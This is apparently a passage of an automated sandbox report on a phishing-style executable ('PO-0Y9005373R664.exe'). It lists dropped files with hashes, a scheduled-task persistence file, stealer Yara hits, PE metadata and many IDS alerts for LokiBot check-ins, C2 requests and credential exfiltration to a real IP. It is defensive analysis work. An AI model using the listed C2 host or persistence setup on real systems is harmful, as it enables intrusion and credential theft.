<StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpD806.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\VvtddClQv.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.110860658719488
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTxv
MD5:	D94CF456F827040D51B15D86759578BF
SHA1:	2B238E094B110ECDAB68AA7F10D3542FC939F3AE
SHA-256:	D6773C572ECD5142FFE0DB736813309C2E2E6E8593D214D5C66C52FDAE2853E7
SHA-512:	16E30A67155B64D692BCF3B8E8C14EC98E98832670C4F281EE790BCDE25ED4DD66C91D8BC240B3AA43428ADBF3EC6D90477BB94EF24D5332FF137D8DE7EF6CCA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7ec63eecc011967c28496572961d2a7c_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll/:AV
MD5:	FEEA5AAD375F1E916BF7E620A6DCD75B
SHA1:	94894605A205FFA9C0FD5D9BE23603C2AFEA3CF9
SHA-256:	D94B1765B6165ACCEA18A12F7DD87FA28A6964E8B3C709967B82DFF961DFF216
SHA-512:	E8A16FF53A2904A6BF0C20910ADF544BF73D7370B012C57A2CA05FC40C7DBFF9622691DF99310E6F131E203B49EAF525737A38CDFCDE817A4B601F71B10861E2
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\VvtddClQv.exe

Download File

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	606216
Entropy (8bit):	7.794779696437517
Encrypted:	false
SSDEEP:	12288:DX1RiTnbj8dvtMgnwyY1zepMXfe2VrPfHCEL2wFikR:DXaTnb0tMx1CpMXGifHCEpFR
MD5:	8C71713FD5663BCBE87118FC47DE3EC5
SHA1:	059FD7D974E27726130B662AF7CB5F45BAC388B5
SHA-256:	A977AFA9D254B586F73B50EED60BE03E124CEE9BF9B1DA069DC7D5FBCD24222B
SHA-512:	A498427376A4965D7F3F47982A96F92103D3FE57B3CC46B52B1F1A6B39187CBA5B324CAE7ABE1D76722CE1B56F8987D2DE18D3F8A1DD82A53AAC28E940E993C3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 59%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....IK...............0.............n.... ... ....@.. .......................`............@................................. ...K.... ...................6...@....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................P.......H........H...m..........\....e...........................................0..........(x...8....(....8......}....8.....(.... ....8....8........E........\|..."..............v...........J...(...........=...y...................g...8......8o... ....8....... .....:....&8}.....{.... ~...(....o.... ....8a.....{.... 6...(....(.... .....9@...& ....85..... H...(y...(.... ....8......{.....{....(....o.... .....:....& ....8......{....r...p(.... .....9....&8......{.... ...(....(.... ....8..

C:\Users\user\AppData\Roaming\VvtddClQv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.794779696437517
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO-0Y9005373R664.exe
File size:	606'216 bytes
MD5:	8c71713fd5663bcbe87118fc47de3ec5
SHA1:	059fd7d974e27726130b662af7cb5f45bac388b5
SHA256:	a977afa9d254b586f73b50eed60be03e124cee9bf9b1da069dc7d5fbcd24222b
SHA512:	a498427376a4965d7f3f47982a96f92103d3fe57b3cc46b52b1f1a6b39187cba5b324cae7abe1d76722ce1b56f8987d2de18d3f8a1dd82a53aac28e940e993c3
SSDEEP:	12288:DX1RiTnbj8dvtMgnwyY1zepMXfe2VrPfHCEL2wFikR:DXaTnb0tMx1CpMXGifHCEpFR
TLSH:	BDD4F11BB7959F00C28C9975C2D7802503FA9A832736D75F3B8A52C969823F55C8E7CE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....IK...............0.............n.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x491e6e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xFB4B49A3 [Wed Aug 8 11:21:07 2103 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x91e20	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x5e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x90a00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x91ddc	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8fe74	0x90000	00693e578353177a88b02570d59f434e	False	0.9050835503472222	data	7.801340855529023	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x5e0	0x600	12115f8fcc0007896de436c4ffde53dd	False	0.4388020833333333	data	4.168041492900222	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x94000	0xc	0x200	62fe13956a105475f417750ff7d0504c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x920a0	0x354	data			0.43661971830985913
RT_MANIFEST	0x923f4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T12:03:19.308276+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49731	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:19.308276+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49731	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:03.565317+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49725	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:03.565317+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49725	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:29.944426+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49759	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:29.944426+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49759	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:01.038490+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49723	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:01.038490+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49723	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:44.823782+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49766	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:44.823782+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49766	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:14.298157+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49729	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:14.298157+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49729	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:16.846754+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49730	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:16.846754+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49730	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:14.840104+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49753	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:14.840104+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49753	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:32.405549+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49760	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:32.405549+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49760	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:11.041687+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49727	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:11.041687+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49727	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:29.282132+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49735	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:29.282132+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49735	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:05.911113+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49725	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:05.911113+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49725	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:06.065702+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49726	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:06.065702+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49726	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:20.114259+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49756	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:20.114259+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49756	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:07.063527+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49750	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:07.063527+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49750	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:16.695709+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49729	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:16.695709+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49729	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:25.029294+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49757	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:25.029294+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49757	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:24.159761+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49732	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:24.159761+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49732	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:54.762512+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49745	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:54.762512+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49745	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:29.124410+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49734	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:29.124410+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49734	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:39.676820+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49763	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:39.676820+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49763	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:56.085560+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49715	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:56.085560+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49715	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:26.573742+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49733	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:26.573742+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49733	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:37.279739+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49762	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:37.279739+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49762	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:24.315194+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49733	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:24.315194+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49733	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:53.568454+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49714	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:53.568454+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49714	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:11.192104+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49728	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:11.192104+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49728	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:17.720151+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49755	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:17.720151+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49755	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:54.915658+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49746	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:54.915658+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49746	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:08.690898+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49727	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:08.690898+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49727	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:59.879049+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49748	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:59.879049+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49748	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:57.235849+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49746	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:57.235849+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49746	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:08.538051+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49726	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:08.538051+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49726	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:31.573054+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49735	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:31.573054+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49735	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:52.278473+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49744	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:52.278473+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49744	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:31.850643+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49736	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:31.850643+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49736	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:30.099350+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49760	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:30.099350+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49760	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:09.894995+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49752	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:09.894995+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49752	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:34.483482+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49737	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:34.483482+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49737	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:37.441389+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49763	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:37.441389+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49763	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:57.393911+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49747	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:57.393911+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49747	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:04.783249+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49750	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:04.783249+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49750	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:42.108847+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49764	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:42.108847+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49764	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:56.010523+0200	TCP	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	49714	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:02.379636+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49749	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:02.379636+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49749	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:42.412382+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49740	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:42.412382+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49740	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:19.961465+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49755	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:19.961465+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49755	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:34.819178+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49761	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:34.819178+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49761	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:44.658105+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49765	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:44.658105+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49765	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:34.162896+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49736	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:34.162896+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49736	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:39.972478+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49738	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:39.972478+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49738	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:39.833421+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49764	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:39.833421+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49764	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:14.151085+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49728	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:14.151085+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49728	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:21.616215+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49731	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:21.616215+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49731	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:51.197441+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49713	80	192.168.2.8	104.248.205.66
